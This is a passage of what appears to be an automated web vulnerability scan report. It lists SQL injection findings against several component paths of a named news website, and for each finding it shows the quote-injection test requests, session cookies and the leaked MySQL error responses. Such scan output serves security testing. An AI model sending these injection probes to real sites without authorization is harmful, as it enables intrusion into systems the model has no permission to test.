HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:18:30 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:18:30 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
...[SNIP]...
1.66. http://www.soundingsonline.com/component/chronocontact/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/component/chronocontact/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /component/chronocontact/?1'=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:18:30 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:18:30 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font> ...[SNIP]...
Request 2
GET /component/chronocontact/?1''=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:18:31 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:18:31 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /component/content'/article/237622 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:08 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font> ...[SNIP]...
Request 2
GET /component/content''/article/237622 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:13 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:12 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /component/content/article'/237622 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:17 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:17 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font> ...[SNIP]...
Request 2
GET /component/content/article''/237622 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:23 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:21 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /component/content/article/237622' HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:33 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:33 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/component/content/article/237622'' AND cookie_info=''' at line 1</font> ...[SNIP]...
Request 2
GET /component/content/article/237622'' HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:36 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:36 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
...[SNIP]...
1.70. http://www.soundingsonline.com/component/content/article/237622 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/component/content/article/237622
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /component/content/article/237622?1'=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:18:54 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:18:54 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font> ...[SNIP]...
Request 2
GET /component/content/article/237622?1''=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:18:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:18:56 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /component'/mailto/?tmpl=component&link=aHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL25ld3MvbWlzaGFwcy1hLXJlc2N1ZXMvMjcyNjQyLW1pc2hhcHMtYS1yZXNjdWVzLWNvbm5lY3RpY3V0LWFuZC1uZXcteW9yay1qYW4%3D HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:18:53 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:18:52 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?tmpl=component&link=aHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL25ld3MvbWlzaGFwcy1' at line 1</font> ...[SNIP]...
Request 2
GET /component''/mailto/?tmpl=component&link=aHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL25ld3MvbWlzaGFwcy1hLXJlc2N1ZXMvMjcyNjQyLW1pc2hhcHMtYS1yZXNjdWVzLWNvbm5lY3RpY3V0LWFuZC1uZXcteW9yay1qYW4%3D HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:18:53 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:18:53 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir=" ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /component/mailto'/?tmpl=component&link=aHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL25ld3MvbWlzaGFwcy1hLXJlc2N1ZXMvMjcyNjQyLW1pc2hhcHMtYS1yZXNjdWVzLWNvbm5lY3RpY3V0LWFuZC1uZXcteW9yay1qYW4%3D HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:18:54 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:18:54 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?tmpl=component&link=aHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL25ld3MvbWlzaGFwcy1' at line 1</font> ...[SNIP]...
Request 2
GET /component/mailto''/?tmpl=component&link=aHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL25ld3MvbWlzaGFwcy1hLXJlc2N1ZXMvMjcyNjQyLW1pc2hhcHMtYS1yZXNjdWVzLWNvbm5lY3RpY3V0LWFuZC1uZXcteW9yay1qYW4%3D HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:18:54 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:18:54 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir=" ...[SNIP]...
The link parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the link parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /component/mailto/?tmpl=component&link=aHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL25ld3MvbWlzaGFwcy1hLXJlc2N1ZXMvMjcyNjQyLW1pc2hhcHMtYS1yZXNjdWVzLWNvbm5lY3RpY3V0LWFuZC1uZXcteW9yay1qYW4%3D' HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:18:42 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:18:42 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/component/mailto/?tmpl=component&link=aHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29t' at line 1</font> ...[SNIP]...
Request 2
GET /component/mailto/?tmpl=component&link=aHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL25ld3MvbWlzaGFwcy1hLXJlc2N1ZXMvMjcyNjQyLW1pc2hhcHMtYS1yZXNjdWVzLWNvbm5lY3RpY3V0LWFuZC1uZXcteW9yay1qYW4%3D'' HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:18:44 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:18:43 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir=" ...[SNIP]...
1.74. http://www.soundingsonline.com/component/mailto/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/component/mailto/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /component/mailto/?tmpl=component&link=aHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL25ld3MvbWlzaGFwcy1hLXJlc2N1ZXMvMjcyNjQyLW1pc2hhcHMtYS1yZXNjdWVzLWNvbm5lY3RpY3V0LWFuZC1uZXcteW9yay1qYW4%3D&1'=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response 1
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:18:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:18:48 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font> ...[SNIP]...
Request 2
